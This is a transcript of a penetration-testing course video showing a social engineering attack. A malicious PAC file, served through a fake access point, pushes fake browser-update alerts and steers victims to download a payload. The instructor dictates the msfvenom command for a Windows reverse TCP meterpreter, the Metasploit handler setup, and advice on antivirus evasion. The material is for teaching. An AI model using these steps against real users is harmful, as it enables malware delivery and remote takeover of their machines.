Welcome to the Network Pentesting course at Pentester Academy. Now in this video, we'll try to see how we could conduct a social engineering based attack using a malicious PAC file. Now consider this specific scenario that on the machine or on the victim machine, a network based PAC is configured, and what I mean by that is the PAC script is available on a specific IP address in the network, right? Now, the first step to conducting this social engineering attack is to hijack layer 2. Now, one of the cases I can give you is, imagine the attacker has created a fake access point at a hotspot location like a coffee shop or airport, and a victim's laptop connects to it, right? We are already aware of tools like Karmetasploit, which can be used to create these fake APs and launch browser-based attacks. But the fact of the matter is, once you hijack layer 2 using one of these techniques, it is very easy for the attacker to redirect all requests to the attacker's machine and service them. Now, once a machine goes ahead and connects to the attacker's fake AP and he hijacks layer 2, then your browser will try and make a request to fetch the proxy.pac file just to check if something has changed. The attacker will then respond to that request and inject a malicious PAC file, right? This PAC file could do a lot of interesting things. Now, one of the things which I found was that alert in JavaScript is an allowed function in a PAC file. So imagine you inject the malicious PAC, and here is one example in which when the victim tries to go ahead and view mybanksite.com, which could be any banking site or any important site which requires credentials, then we actually send him an alert first saying to update his software before he can connect, right? Fantastic. So let me give you an example. So here is my victim machine. Here is the attacker machine, and let me open up the proxy.pac file. Now what we'll actually do is, in this specific case, just as a variation of what I showed you on the slides, right, for every single request we would ideally go ahead and want to force the user into downloading and upgrading his browser, right? And this is where now, I'm not even checking which site he's really trying to go to. I'm going to alert, please update your browser, urgent security issue, and return the attacker proxy IP addresses. And in the index.html file, I go ahead and redirect to update.exe stored on the attacker's server. And this could mention any message which says please install update to access your banking site or to access the internet, right? Remember to turn on Apache after this. Now let's also generate update.exe, which is very simply going to be a reverse TCP meterpreter. So I can use msf venom -p Windows meterpreter reverse TCP lhost equals the attacker IP 192.168.1.10. Output format is exe, and then we can pipe this to update.exe. So let's redirect this output and create update.exe. Let's verify update.exe. Okay, fantastic. Now let's also set up Metasploit. So what we'll do is that no matter what URL the user types in, the malicious PAC will keep sending him alert messages, right? And eventually update.exe would be pushed out to him, and hopefully a gullible user would end up running update.exe. Let me pause while Metasploit is loading. Let's set up the exploit handler, exploit multi-handler, set payload, Windows, Metapreter, reverse TCP, set lhost 192.168.1.10, which is the attacker machine, hit an exploit, and now we are waiting for the inbound connection. Now on the attacker machine, on the victim machine, let's open up the browser, and if you notice, it immediately gives you an alert which says please update your browser, urgent issue, again and again and again, right? So pretty much no matter what you try to access, this is exactly what you end up getting. So let's type in a URL now. Let's say we get the alert, right? And it says please install update to access the internet, again an alert, and if you notice, IE tells you that there is a file available for download, and there you go, update.exe pops up. You hit a run because at this point you aren't able to access the internet, and if you notice, by default AVG would end up detecting this as a virus, or rather any antivirus. Now I've talked about AV evasion in previous videos, so in this case we aren't going to talk about AV evasion, but refer to some of the previous videos which I have created, especially the one in which I use the Python based procedure to go ahead and create a payload which is not vulnerable to detection. So I'm just going to run that one just to make you keep in mind that this is really what you may end up seeing. So we'll go to that binary, and let's say this was the binary which we were serving, then we would get a Metapreter prompt, right? Alternately, one could disable the AV for just a bit. So I've disabled the AV in this case just so that our base payload can work. And once again, if you had visited any site, you would again continue to get these little alerts, right? Request for a file download, and when you run update.exe, right, you'd actually end up getting your Metapreter. Now keep in mind, of course, AV evasion is something you would have to do in most of these cases, and that's the reason why I showed you specifically that the base payload will be detected, and you should use one of the AV detection techniques we have discussed in this course. If you scroll up, you should find a couple of those videos, and you should try and use them. Right, fantastic. So hopefully this social engineering attack was interesting and clear to you. Of course, the alerts can also be served by injecting into HTML or by sending out malicious HTML. The interesting part here, of course, is we did everything using just the PAC file. So hope you guys have enjoyed this video, and if you're having fun here at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.